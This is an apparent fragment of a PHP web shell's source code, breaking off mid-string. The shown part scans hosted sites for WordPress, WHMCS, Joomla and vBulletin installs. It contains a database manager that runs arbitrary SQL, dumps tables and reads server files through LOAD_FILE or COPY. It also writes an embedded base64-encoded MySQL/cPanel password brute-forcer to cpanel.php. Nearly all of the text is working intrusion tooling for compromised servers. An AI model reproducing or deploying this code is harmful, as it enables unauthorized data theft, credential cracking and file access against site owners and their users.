$IIIIIIII1I1I = "<a href='" . $IIIIIIIII1l1 . "' target='_blank'>Wordpress</a>";
} elseif (strpos($IIIIIIIIlIIl, '200') == true) {
$IIIIIIII1I1I = "<a href='" . $IIIIIIIII111 . "' target='_blank'>Wordpress</a>";
} elseif (strpos($IIIIIIIIlIll, '200') == true and strpos($IIIIIIII1III, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIl11l . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIl1lI, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1I1 . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIl11I, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>";
} elseif (strpos($IIIIIIIIlIll, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIlII1 . "' target='_blank'>Joomla</a>";
} elseif (strpos($IIIIIIIIlI1l, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIlIl1 . "' target='_blank'>Joomla</a>";
} elseif (strpos($IIIIIIIIllIl, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIlI11 . "' target='_blank'>vBulletin</a>";
} elseif (strpos($IIIIIIIIllll, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIllI1 . "' target='_blank'>vBulletin</a>";
} elseif (strpos($IIIIIIIIll1l, '200') == true) {
$IIIIIIII1I1I = " <a href='" . $IIIIIIIIlll1 . "' target='_blank'>vBulletin</a>";
} else {
continue;
}
$IIIIIIII1I1l = $IIIIIIIII1I1['name'];
echo '<tr><td><a href=http://www.' . $IIIIIIIIIl11[1][0] . '/>' . $IIIIIIIIIl11[1][0] . '</a></td>
<td>' . $IIIIIIII1I1I . '</td></tr>';
flush();
}
}
}
}
echo "</center></table>";
}
echo "</div>";
yemenfooter();
}
function yemensql()
{
class DbClass
{
var $type;
var $link;
var $res;
function DbClass($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case 'mysql':
if ($this->link = @mysql_connect($host, $user, $pass, true)) {
return true;
}
break;
case 'pgsql':
$host = explode(':', $host);
if (!$host[1]) {
$host[1] = 5432;
}
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case 'mysql':
if (@mysql_select_db($db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
case 'pgsql':
return $this->res = @pg_query($this->link, $str);
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
case 'pgsql':
return @pg_fetch_assoc($res);
}
return false;
}
function listDbs()
{
switch ($this->type) {
case 'mysql':
return $this->query("SHOW databases");
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
}
return false;
}
function listTables()
{
switch ($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
}
return false;
}
function error()
{
switch ($this->type) {
case 'mysql':
return @mysql_error();
case 'pgsql':
return @pg_last_error();
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case 'mysql':
if (function_exists('mysql_set_charset')) {
return @mysql_set_charset($str, $this->link);
} else {
$this->query('SET CHARSET ' . $str);
}
break;
case 'pgsql':
return @pg_set_client_encoding($this->link, $str);
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
case 'pgsql':
$this->query("CREATE TABLE wso2(file text);\r\n\r\n\r\nCOPY wso2 FROM '" . addslashes($str) . "';\r\n\r\n\r\nselect file from wso2;\r\n\r\n\r\n");
$r = array();
while ($i = $this->fetch()) {
$r[] = $i['file'];
}
$this->query('drop table wso2');
return array('file' => implode("\r\n", $r));
}
return false;
}
function dump($table, $fp = false)
{
switch ($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `' . $table . '`');
$create = mysql_fetch_array($res);
$sql = $create[1] . ";\r\n\r\n\r\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$this->query('SELECT * FROM `' . $table . '`');
$head = true;
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
if ($v == null) {
$item[$k] = "NULL";
} elseif (is_numeric($v)) {
$item[$k] = $v;
} else {
$item[$k] = "'" . @mysql_real_escape_string($v) . "'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql = 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \r\n\t(" . implode(", ", $item) . ')';
$head = false;
} else {
$sql = "\r\n\t,(" . implode(", ", $item) . ')';
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
if (!$head) {
if ($fp) {
fwrite($fp, ";\r\n\r\n\r\n");
} else {
echo ";\r\n\r\n\r\n";
}
}
break;
case 'pgsql':
$this->query('SELECT * FROM ' . $table);
while ($item = $this->fetch()) {
$columns = array();
foreach ($item as $k => $v) {
$item[$k] = "'" . addslashes($v) . "'";
$columns[] = $k;
}
$sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');
' . "\r\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
break;
}
return false;
}
}
$db = new DbClass($_POST['type']);
if (@$_POST['p2'] == 'download') {
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
if (empty($_POST['file'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment;\r\n\r\n\r\n filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) {
$db->dump($v);
}
exit;
} elseif ($fp = @fopen($_POST['file'], 'w')) {
foreach ($_POST['tbl'] as $v) {
$db->dump($v, $fp);
}
fclose($fp);
unset($_POST['p2']);
} else {
die('<script>alert("Error! Can\'t open file");
window.history.back(-1)</script>');
}
}
yemenhead();
echo "\r\n<div class=header>\r\n<form name='sf' method='post' onsubmit='fs(this);\r\n\r\n\r\n'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') {
echo "selected";
}
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') {
echo "selected";
}
echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>\r\n<td><input type=text name=sql_login value='" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "'></td>\r\n<td><input type=text name=sql_pass value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) {
if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch ($_POST['charset']) {
case "Windows-1251":
$db->setCharset('cp1251');
break;
case "UTF-8":
$db->setCharset('utf8');
break;
case "KOI8-R":
$db->setCharset('koi8r');
break;
case "KOI8-U":
$db->setCharset('koi8u');
break;
case "cp866":
$db->setCharset('cp866');
break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while ($item = $db->fetch()) {
list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
}
echo "</select>";
} else {
echo $tmp;
}
} else {
echo $tmp;
}
echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);\r\n\r\n\r\n'></td>\r\n<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n\r\n\r\n function fs(f) {\r\nif(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n\r\n\r\n if(f.p1) f.p1.value='';\r\n\r\n\r\n if(f.p2) f.p2.value='';\r\n\r\n\r\n if(f.p3) f.p3.value='';\r\n\r\n\r\n}\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\r\n\r\n\t\t\t\td.sf.p2.value = t;\r\n\r\n\r\nif(l && d.sf.p3) d.sf.p3.value = l;\r\n\r\n\r\n\t\t\t\td.sf.submit();\r\n\r\n\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;\r\n\r\n\r\ni<d.sf.elements['tbl[]'].length;\r\n\r\n\r\n++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\r\n\r\n\t\t\t}\r\n\t\t</script>";
if (isset($db) && $db->link) {
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) {
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;\r\n\r\n\r\n'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
if (!empty($_POST['sql_count'])) {
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
}
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> \r\n\r\n\r\n<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '
' : " <small>({$n['n']})</small>") . "</nobr><br>";
}
echo "<input type='checkbox' onclick='is();\r\n\r\n\r\n'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";\r\n\r\n\r\ndocument.sf.submit();\r\n\r\n\r\n'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;\r\n\r\n\r\n'>";
if (@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">";
echo " of {$pages}";
if ($_POST['p3'] > 1) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'><\r\n\r\n\r\n Prev</a>";
}
if ($_POST['p3'] < $pages) {
echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next >\r\n\r\n\r\n</a>";
}
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') {
$_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
} else {
$_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
}
echo "<br><br>";
}
if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
$db->query(@$_POST['p2']);
if ($db->res !== false) {
$title = false;
echo "<table width=100% cellspacing=1 cellpadding=2 class=main style=\"background-color:#292929\">";
$line = 1;
while ($item = $db->fetch()) {
if (!$title) {
echo "<tr>";
foreach ($item as $key => $value) {
echo '<th>' . $key . '</th>';
}
reset($item);
$title = true;
echo "</tr><tr>";
$line = 2;
}
echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) {
if ($value == null) {
echo "<td><i>null</i></td>";
} else {
echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
}
}
echo "</tr>";
}
echo "</table>";
} else {
echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";\r\n\r\n\r\nd.sf.p2.value=this.query.value;\r\n\r\n\r\ndocument.sf.submit();\r\n\r\n\r\nreturn false;\r\n\r\n\r\n'><textarea name='query' style='width:100%;\r\n\r\n\r\nheight:100px'>";
if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
echo htmlspecialchars($_POST['p2']);
}
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if ($_POST['type'] == 'mysql') {
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch()) {
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";\r\n\r\n\r\ndocument.sf.p2.value=this.f.value;\r\n\r\n\r\ndocument.sf.submit();\r\n\r\n\r\nreturn false;\r\n\r\n\r\n'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
}
}
if (@$_POST['p1'] == 'loadfile') {
$file = $db->loadFile($_POST['p2']);
echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
}
} else {
echo htmlspecialchars($db->error());
}
echo "</div>";
yemenfooter();
}
function yemenbf()
{
yemenhead();
$cp1 = 'PD9waHANCkBzZXRfdGltZV9saW1pdCgwKTsNCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQplY2hvICcNCjxoZWFkPg0KDQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAgICBmb250LXNpemU6IDE4cHg7DQoJY29sb3I6ICNjY2NjY2M7DQp9DQppbnB1dCx0ZXh0YXJlYSxzZWxlY3R7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjY2NjY2NjOw0KZGFzaGVkICNmZmZmZmY7DQpib3JkZXI6IDFweA0Kc29saWQgIzJDMkMyQzsNCmJhY2tncm91bmQtY29sb3I6ICMwODA4MDgNCn0NCmEgew0KCWJhY2tncm91bmQtY29sb3I6ICMxNTE1MTU7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzAwMDsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCmE6aG92ZXIgew0KCWJhY2tncm91bmQtY29sb3I6ICMwODA4MDg7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzMzMzsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCi5zdHlsZTEgew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5zdHlsZTIgew0KCWNvbG9yOiAjRkZGRkZGOw0KCWZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KLnN0eWxlMyB7DQoJY29sb3I6ICNGRkZGRkY7DQp9DQotLT4NCjwvc3R5bGU+DQoNCjwvaGVhZD4NCic7DQpmdW5jdGlvbiBpbigkdHlwZSwkbmFtZSwkc2l6ZSwkdmFsdWUsJGNoZWNrZWQ9MCkgDQp7DQokcmV0ID0gIjxpbnB1dCB0eXBlPSIuJHR5cGUuIiBuYW1lPSIuJG5hbWUuIiAiO2lmKCRzaXplICE9IDApIA0Kew0KJHJldCAuPSAic2l6ZT0iLiRzaXplLiIgIjt9DQokcmV0IC49ICJ2YWx1ZT1cIiIuJHZhbHVlLiJcIiI7aWYoJGNoZWNrZWQpICRyZXQgLj0gIiBjaGVja2VkIjtyZXR1cm4gJHJldC4iPiI7fQ0KZWNobyAiPGJyPjx0aXRsZT5CcnV0ZSBGb3JjZSBCeSBNb25kczwvdGl0bGU+PGZvcm0gbmFtZT1mb3JtIG1ldGhvZD1QT1NUPiI7DQplY2hvIGluKCdoaWRkZW4nLCdkYicsMCwkX1BPU1RbJ2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2RiX3NlcnZlcicsMCwkX1BPU1RbJ2RiX3NlcnZlciddKTtlY2hvIGluKCdoaWRkZW4nLCdkYl9wb3J0JywwLCRfUE9TVFsnZGJfcG9ydCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9sJywwLCRfUE9TVFsnbXlzcWxfbCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9wJywwLCRfUE9TVFsnbXlzcWxfcCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9kYicsMCwkX1BPU1RbJ215c3FsX2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2NjY2MnLDAsJ2RiX3F1ZXJ5Jyk7DQoNCmlmKCRfUE9TVFsncGFnZSddPT0nZmluZCcpDQp7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJuYW1lcyddKSAmJmlzc2V0KCRfUE9TVFsncGFzc3dvcmRzJ10pKQ0Kew0KaWYoJF9QT1NUWyd0eXBlJ10gPT0gJ3Bhc3N3ZCcpew0KJGUgPSBleHBsb2RlKCJcbiIsJF9QT1NUWyd1c2VybmFtZXMnXSk7DQpmb3JlYWNoKCRlIGFzICR2YWx1ZSl7DQokayA9IGV4cGxvZGUoIjoiLCR2YWx1ZSk7DQokdXNlcm5hbWUgLj0gJGtbJzAnXS4iICI7DQp9DQp9ZWxzZWlmKCRfUE9TVFsndHlwZSddID09ICdzaW1wbGUnKXsNCiR1c2VybmFtZSA9IHN0cl9yZXBsYWNlKCJcbiIsJyAnLCRfUE9TVFsndXNlcm5hbWVzJ10pOw0KfQ0KJGExID0gZXhwbG9kZSgiICIsJHVzZXJuYW1lKTsNCiRhMiA9IGV4cGxvZGUoIlxuIiwkX1BPU1RbJ3Bhc3N3b3JkcyddKTsNCiRpZDIgPSBjb3VudCgkYTIpOw0KJG9rID0gMDsNCmZvcmVhY2goJGExIGFzICR1c2VyICkNCnsNCmlmKCR1c2VyICE9PSAnJykNCnsNCiR1c2VyPXRyaW0oJHVzZXIpOw0KZm9yKCRpPTA7JGk8PSRpZDI7JGkrKykNCnsNCiRwYXNzID0gdHJpbSgkYTJbJGldKTsNCmlmKEBteXNxbF9jb25uZWN0KCdsb2NhbGhvc3QnLCR1c2VyLCRwYXNzKSkNCnsNCmVjaG8gIkJMQUNLfiB1c2VyIGlzICg8Yj48Zm9udCBjb2xvcj1ncmVlbj4kdXNlcjwvZm9udD48L2I+KSBQYXNzd29yZCBpcyAoPGI+PGZvbnQgY29sb3I9Z3JlZW4+JHBhc3M8L2ZvbnQ+PC9iPik8YnIgLz4iOw0KJG9rKys7DQp9DQp9DQp9DQp9DQplY2hvICI8aHI+PGI+WW91IEZvdW5kIDxmb250IGNvbG9yPWdyZWVuPiRvazwvZm9udD4gQ3BhbmVsIEJ5IEJMQUNLIFNjcmlwdCBOYW1lPC9iPiI7DQplY2hvICI8Y2VudGVyPjxiPjxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iPkJBQ0s8L2E+IjsNCmV4aXQ7DQp9DQp9DQo7ZWNobyAnDQoNCg0KDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIHRhcmdldD0iX2JsYW5rIj4NCgk8c3Ryb25nPg0KPGlucHV0IG5hbWU9InBhZ2UiIHR5cGU9ImhpZGRlbiIgdmFsdWU9ImZpbmQiPiAgICAgICAgCQkJCQ0KICAgIDwvc3Ryb25nPg0KICAgIDx0YWJsZSB3aWR0aD0iNjAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+DQogICAgPHRyPg0KICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiPjxjZW50ZXI+PGJyPg0KCQk8L3N0cm9uZz4NCgkJPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL21vbmRzLmhhY2tlcnMiIGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+RGV2ZWxvcGVkIEJ5IA0KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk1vbmRzPC9mb250Pjwvc3Ryb25nPjwvYT48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+PC9jZW50ZXI+PC90ZD48L2ZvbnQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkPg0KICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMyIgY2VsbHNwYWNpbmc9IjEiIGFsaWduPSJjZW50ZXIiPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY2xhc3M9InN0eWxlMiIgc3R5bGU9IndpZHRoOiAxMzlweCI+DQoJPHN0cm9uZz5Vc2VyIDo8L3N0cm9uZz48L3RkPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY29sc3Bhbj0iNSI+PHN0cm9uZz48dGV4dGFyZWEgY29scz0iNDAiIHJvd3M9IjEwIiBuYW1lPSJ1c2VybmFtZXMiPjwvdGV4dGFyZWE+PC9zdHJvbmc+PC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNsYXNzPSJzdHlsZTIiIHN0eWxlPSJ3aWR0aDogMTM5cHgiPg0KCTxzdHJvbmc+UGFzcyA6PC9zdHJvbmc+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PHRleHRhcmVhIGNvbHM9IjQwIiByb3dzPSIxMCIgbmFtZT0icGFzc3dvcmRzIj48L3RleHRhcmVhPjwvc3Ryb25nPjwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjbGFzcz0ic3R5bGUyIiBzdHlsZT0id2lkdGg6IDEzOXB4Ij4NCgk8c3Ryb25nPlR5cGUgOjwvc3Ryb25nPjwvdGQ+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjb2xzcGFuPSI1Ij4NCiAgICA8c3BhbiBjbGFzcz0ic3R5bGUyIj48c3Ryb25nPlNpbXBsZSA6IDwvc3Ryb25nPiA8L3NwYW4+DQoJPHN0cm9uZz4NCgk8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9InR5cGUiIHZhbHVlPSJzaW1wbGUiIGNoZWNrZWQ9ImNoZWNrZWQiIGNsYXNzPSJzdHlsZTMiPjwvc3Ryb25nPg0KICAgIDxmb250IGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+L2V0Yy9wYXNzd2QgOiA8L3N0cm9uZz4gPC9mb250Pg0KCTxzdHJvbmc+DQoJPGlucHV0IHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0icGFzc3dkIiBjbGFzcz0ic3R5bGUzIj48L3N0cm9uZz48c3BhbiBjbGFzcz0ic3R5bGUzIj48c3Ryb25nPg0KCTwvc3Ryb25nPg0KCTwvc3Bhbj4NCiAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgc3R5bGU9IndpZHRoOiAxMzlweCI+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9InN0YXJ0Ij4NCiAgICA8L3N0cm9uZz4NCiAgICA8L3RkPg0KICAgIDx0cj4NCjwvZm9ybT4gICAgDQogICAgDQogICAgDQogICANCic7DQppZigkX1BPU1RbJ2F0dCddPT1udWxsKQ0Kew0KZWNobyAnCQkJCQkJICc7DQp9ZWxzZXsNCmVjaG8gIgkJCQkJCSANCgkJCQkJCSANCiI7DQp9';
$file = fopen("cpanel.php", "w+");
$file = fopen("cpanel.php", "w+");
$write = fwrite($file, "<?php\r\n@set_time_limit(0);\r\n@error_reporting(0);\r\necho '\r\n<head>\r\n\r\n<style type=\"text/css\">\r\n<!--\r\nbody {\r\n\tbackground-color: #000000;\r\n font-size: 18px;\r\n\tcolor: #cccccc;\r\n}\r\ninput,textarea,select{\r\nfont-weight: bold;\r\ncolor: #cccccc;\r\ndashed #ffffff;\r\nborder: 1px\r\nsolid #2C2C2C;\r\nbackground-color: #080808\r\n}\r\na {\r\n\tbackground-color: #151515;\r\n\tvertical-align: bottom;\r\n\tcolor: #000;\r\n\ttext-decoration: none;\r\n\tfont-size: 20px;\r\n\tmargin: 8px;\r\n\tpadding: 6px;\r\n\tborder: thin solid #000;\r\n}\r\na:hover {\r\n\tbackground-color: #080808;\r\n\tvertical-align: bottom;\r\n\tcolor: #333;\r\n\ttext-decoration: none;\r\n\tfont-size: 20px;\r\n\tmargin: 8px;\r\n\tpadding: 6px;\r\n\tborder: thin solid #000;\r\n}\r\n.style1 {\r\n\ttext-align: center;\r\n}\r\n.style2 {\r\n\tcolor: #FFFFFF;\r\n\tfont-weight: bold;\r\n}\r\n.style3 {\r\n\tcolor: #FFFFFF;\r\n}\r\n-->\r\n</style>\r\n\r\n</head>\r\n';\r\nfunction in(\$type,\$name,\$size,\$value,\$checked=0) \r\n{\r\n\$ret = \"<input type=\".\$type.\" name=\".\$name.\" \";if(\$size != 0) \r\n{\r\n\$ret .= \"size=\".\$size.\" \";}\r\n\$ret .= \"value=\\\"\".\$value.\"\\\"\";if(\$checked) \$ret .= \" checked\";return \$ret.\">\";}\r\necho \"<br><title>Brute Force By Monds</title><form name=form method=POST>\";\r\necho in('hidden','db',0,\$_POST['db']);echo in('hidden','db_server',0,\$_POST['db_server']);echo in('hidden','db_port',0,\$_POST['db_port']);echo in('hidden','mysql_l',0,\$_POST['mysql_l']);echo in('hidden','mysql_p',0,\$_POST['mysql_p']);echo in('hidden','mysql_db',0,\$_POST['mysql_db']);echo in('hidden','cccc',0,'db_query');\r\n\r\nif(\$_POST['page']=='find')\r\n{\r\nif(isset(\$_POST['usernames']) &&isset(\$_POST['passwords']))\r\n{\r\nif(\$_POST['type'] == 'passwd'){\r\n\$e = explode(\"\\n\",\$_POST['usernames']);\r\nforeach(\$e as \$value){\r\n\$k = explode(\":\",\$value);\r\n\$username .= \$k['0'].\" \";\r\n}\r\n}elseif(\$_POST['type'] == 'simple'){\r\n\$username = str_replace(\"\\n\",' ',\$_POST['usernames']);\r\n}\r\n\$a1 = explode(\" \",\$username);\r\n\$a2 = explode(\"\\n\",\$_POST['passwords']);\r\n\$id2 = count(\$a2);\r\n\$ok = 0;\r\nforeach(\$a1 as \$user )\r\n{\r\nif(\$user !== '')\r\n{\r\n\$user=trim(\$user);\r\nfor(\$i=0;\$i<=\$id2;\$i++)\r\n{\r\n\$pass = trim(\$a2[\$i]);\r\nif(@mysql_connect('localhost',\$user,\$pass))\r\n{\r\necho \"BLACK~ user is (<b><font color=green>\$user</font></b>) Password is (<b><font color=green>\$pass</font></b>)<br />\";\r\n\$ok++;\r\n}\r\n}\r\n}\r\n}\r\necho \"<hr><b>You Found <font color=green>\$ok</font> Cpanel By BLACK Script Name</b>\";\r\necho \"<center><b><a href=\".\$_SERVER['PHP_SELF'].\">BACK</a>\";\r\nexit;\r\n}\r\n}\r\n;echo '\r\n\r\n\r\n\r\n<form method=\"POST\" target=\"_blank\">\r\n\t<strong>\r\n<input name=\"page\" type=\"hidden\" value=\"find\"> \t\t\t\t\r\n </strong>\r\n <table width=\"600\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n <tr>\r\n <td valign=\"top\" bgcolor=\"#151515\"><center><br>\r\n\t\t</strong>\r\n\t\t<a href=\"https://www.facebook.com/monds.hackers\" class=\"style2\"><strong>Developed By \r\n<font color=\"#FF0000\">Monds</font></strong></a><font color=\"#FF0000\"></center></td></font>\r\n </tr>\r\n <tr>\r\n <td>\r\n <table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n <td valign=\"top\" bgcolor=\"#151515\" class=\"style2\" style=\"width: 139px\">\r\n\t<strong>User 